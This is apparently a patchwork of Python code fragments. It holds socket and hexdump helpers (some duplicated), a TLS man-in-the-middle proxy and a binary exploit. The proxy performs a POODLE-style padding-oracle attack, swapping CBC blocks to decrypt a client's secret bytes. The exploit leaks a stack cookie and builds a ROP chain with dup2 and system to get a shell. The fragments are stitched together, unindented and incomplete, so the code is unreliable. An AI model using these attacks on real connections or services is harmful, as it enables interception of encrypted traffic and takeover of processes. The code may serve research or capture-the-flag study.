def print_data(msg, data):
if log.isEnabledFor(logging.DEBUG):
print(msg, file=sys.stderr)
if print_hexdump:
print_hexdump(data, colored=True, file=sys.stderr)
else:
print(data, file=sys.stderr)
def write(self, data):
if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False:
log.debug('Sent Data:')
print_hexdump(data, colored=True, file=sys.stderr)
self._socket.setblocking(1)
self._socket.sendall(data)
def write(self, data):
if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False:
log.debug('Sent Data:')
print_hexdump(data, colored=True, file=sys.stderr)
self._socket.setblocking(1)
self._socket.sendall(data)
def read(self, count=None):
data = None
if count is None:
self._socket.setblocking(0)
rs = [self._socket]
rs, _, _ = select.select(rs, [], [])
if rs:
data = rs[0].recv(4096)
else:
self._socket.setblocking(1)
data = b''
while count:
d = self._socket.recv(count)
count -= len(d)
data += d
if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False:
log.debug('Recved Data:')
print_hexdump(data, colored=True, file=sys.stderr)
return data
def read(self, count=None):
data = None
if count is None:
self._socket.setblocking(0)
rs = [self._socket]
rs, _, _ = select.select(rs, [], [])
if rs:
data = rs[0].recv(4096)
else:
self._socket.setblocking(1)
data = b''
while count:
d = self._socket.recv(count)
count -= len(d)
data += d
if log.isEnabledFor(logging.DEBUG) and print_hexdump is not False:
log.debug('Recved Data:')
print_hexdump(data, colored=True, file=sys.stderr)
return data
def handle(self):
self.log.info("New connection to %r from %r",
self.server.server_address,
self.client_address)
filename = None
if self.server.catcher.logdir is not None:
filename = self.server.catcher.logdir / "{}_{}-{}_{}.log".format(
*(self.server.server_address + self.client_address)
)
for block in iter(partial(self.request.recv, 1024 * 4), b''):
self.log.info('Received %d bytes from %r', len(block), self.client_address)
if filename is not None:
with filename.open('a') as fp:
fp.write("{}: {}\n".format(datetime.now(), block.hex()))
print_hexdump(block, colored=True, cols=16)
self.log.info("Closing connection to %r from %r",
self.server.server_address,
self.client_address)
def start(self):
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('', self.core.port))
server.listen()
DEBUG = log.isEnabledFor(logging.DEBUG)
def info(*args, **kwargs):
if not log.isEnabledFor(logging.INFO):
return
args = tuple(map(self.core._color, args))
print(*args, **kwargs)
decrypted = ''
while True:
s1 = StreamSocket(server.accept()[0], SSL)
log.info('Connecting to %s:%d', self.core.ip, self.core.port)
s2 = StreamSocket(
socket.create_connection((self.core.ip, self.core.port)), SSL)
peerof = {s1: s2, s2: s1}
label = {s1: 'client', s2: 'server'}
stop = False
ctx = TLSSessionCtx('foo')
ctx.server_ctx.load_rsa_keys_from_file(self.core.private_key)
client_request = None
block_offset = self.core.block_offset
try:
while not stop:
ins, outs, errs = select([s1, s2], [], [], None)
for s in ins:
info("\033[97m>", label[s], "\033[0m")
p = s.recv()
if p is None or len(p) == 0:
stop = True
break
if p.haslayer(TLSServerHello):
ctx.printed = False
ctx.master_secret = None
ctx.match_server = s
elif p.haslayer(TLSClientHello):
ctx.match_client = s
ctx.insert(p)
# p.show()
cipherdata = []
plaindata = []
for record in p.records:
if record.haslayer(TLSRecord) and record[
TLSRecord].content_type == TLSContentType.HANDSHAKE:
continue
if record.haslayer(TLSCiphertext):
cipherdata.append(
(record, record[TLSCiphertext].data))
# print("\033[91mCiphertext\033[0m")
# print_hexdump(record[TLSCiphertext].data, colored=True, cols=ctx.sec_params.block_size)
if p.haslayer(TLSCiphertext) or (p.haslayer(TLSAlert)
and p.haslayer(Raw)):
# if ctx.master_secret and not ctx.printed:
# print(ctx)
# ctx.printed = True
if s == ctx.match_client:
ctx.set_mode(server=True)
elif s == ctx.match_server:
ctx.set_mode(client=True)
if DEBUG:
ssl = SSL(bytes(p), ctx=ctx)
for record in ssl.records:
if record.haslayer(TLSPlaintext):
plaintext = record[TLSPlaintext]
data = plaintext.data + plaintext.mac + plaintext.padding + bytes(
[plaintext.padding_len])
plaindata.append(data)
else:
plaindata = [b''] * len(cipherdata)
if ctx.sec_params is not None:
mac_length = ctx.sec_params.mac_key_length
mac_length += ctx.sec_params.block_size - (
mac_length % ctx.sec_params.block_size)
for (record,
cipher), plain in zip(cipherdata, plaindata):
if len(cipher) > mac_length:
if label[s] == 'client':
info(
"\033[94mProbably Request ({} > {})\033[0m"
.format(len(cipher), mac_length))
client_request = cipher
elif label[s] == 'server':
info(
"\033[94mProbably Response ({} > {})\033[0m"
.format(len(cipher), mac_length))
info("\033[91mCiphertext\033[0m")
print_hexdump(cipher,
colored=True,
cols=ctx.sec_params.block_size,
bright=self.core.bright)
if DEBUG:
info("\033[92mPlaintext\033[0m")
print_hexdump(plain,
colored=True,
cols=ctx.sec_params.block_size,
bright=self.core.bright)
if len(cipher) > mac_length:
if label[s] == 'client':
secret_block = cipher[
block_offset:block_offset +
ctx.sec_params.block_size]
cipher = cipher[:-ctx.sec_params.
block_size] + secret_block
record[TLSCiphertext].data = cipher
info("\033[91mCiphertext new\033[0m")
print_hexdump(
cipher,
colored=True,
cols=ctx.sec_params.block_size,
bright=self.core.bright)
# p.show()
elif label[s] == 'server':
a = client_request[
-ctx.sec_params.block_size - 1]
b = client_request[block_offset - 1]
im = a ^ (ctx.sec_params.block_size - 1)
ch = b ^ im
decrypted = chr(ch) + decrypted
info(
"Decrypted: '{}' (0x{:02x} = 0x{:02x}^0x{:02x}^0x{:02x})"
.format(decrypted, ch, a,
ctx.sec_params.block_size - 1,
b))
input('Enter to continue')
s = peerof[s]
s.send(p)
except OSError:
pass
system_addr = base_addr + libc.symbols['system']
exit_addr = base_addr + libc.symbols['exit']
log.info("System Addr: 0x{:x}".format(system_addr))
log.info("Exit Addr: 0x{:x}".format(exit_addr))
r.sendline("2")
data = r.recvuntil(">")
r.sendline("AAAA")
data = r.recvuntil(">")
stack_cookie = data[0x138:0x140]
stored_rbp_word = struct.unpack('<Q', data[0x140:0x144] + '\0\0\0\0')[0]
stored_rbp = stored_rbp_word + (0xffffffff00000000 & puts_addr)
print_hexdump(stack_cookie, cols=16)
log.info('Stored RBP: %x (%x)', stored_rbp, stored_rbp_word)
rbp = stored_rbp - 0x20 - 0x10
log.info('RBP: %x', rbp)
buffer_start = rbp - 0x140
buffer_end = buffer_start + BUF_SIZE
rop.raw(unpack(stack_cookie))
rop.raw(stored_rbp)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.system(0x0017c8c3 + base_addr)
r.sendline("2")
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('Database', type=argparse.FileType('rb'))
args = parser.parse_args(args=argv)
fp = args.Database
while True:
try:
tag, data = parse(fp)
if tag == 0xA9:
assert len(data) >= 4
offset = struct.unpack_from('<I', data)[0] + 4
assert offset < len(data)
some_type = struct.unpack_from('<B', data[offset:])[0]
if some_type == 9:
data_type, trust_code = struct.unpack_from('<BB', data[4:])
entry_data = data[6:offset]
item = Item(EntryType(data_type), TrustLevel(trust_code),
entry_data, data[offset + 2:])
print(str(item))
elif tag == 0xAC:
print("Encrypted signature:")
print_hexdump(data, colored=True, header=True)
signature = PUBLIC_KEY.encrypt(bytes(reversed(data)), None)[0]
print("\n");
print("Decrypted signature (DER):")
print_hexdump(signature, colored=True, header=True, folded=True)
print("\n");
signature = signature.split(b'\x00', 1)[1]
try:
assert signature[0] == 0x30
l = signature[1]
signature = signature[2:2+l]
assert signature[0] == 0x30
l = signature[1]
algo = signature[2:2+l]
hashsum = signature[2+l:]
assert hashsum[0] == 0x4
l = hashsum[1]
hashsum = hashsum[2:l+2]
print("Hash:", hashsum.hex())
print("\n");
except:
pass
elif tag == 0x5C:
continue;
elif tag == 0x5D:
continue;
else:
raise ValueError("Parsing error. Unknown tag {:02x}".format(tag))
except IndexError:
break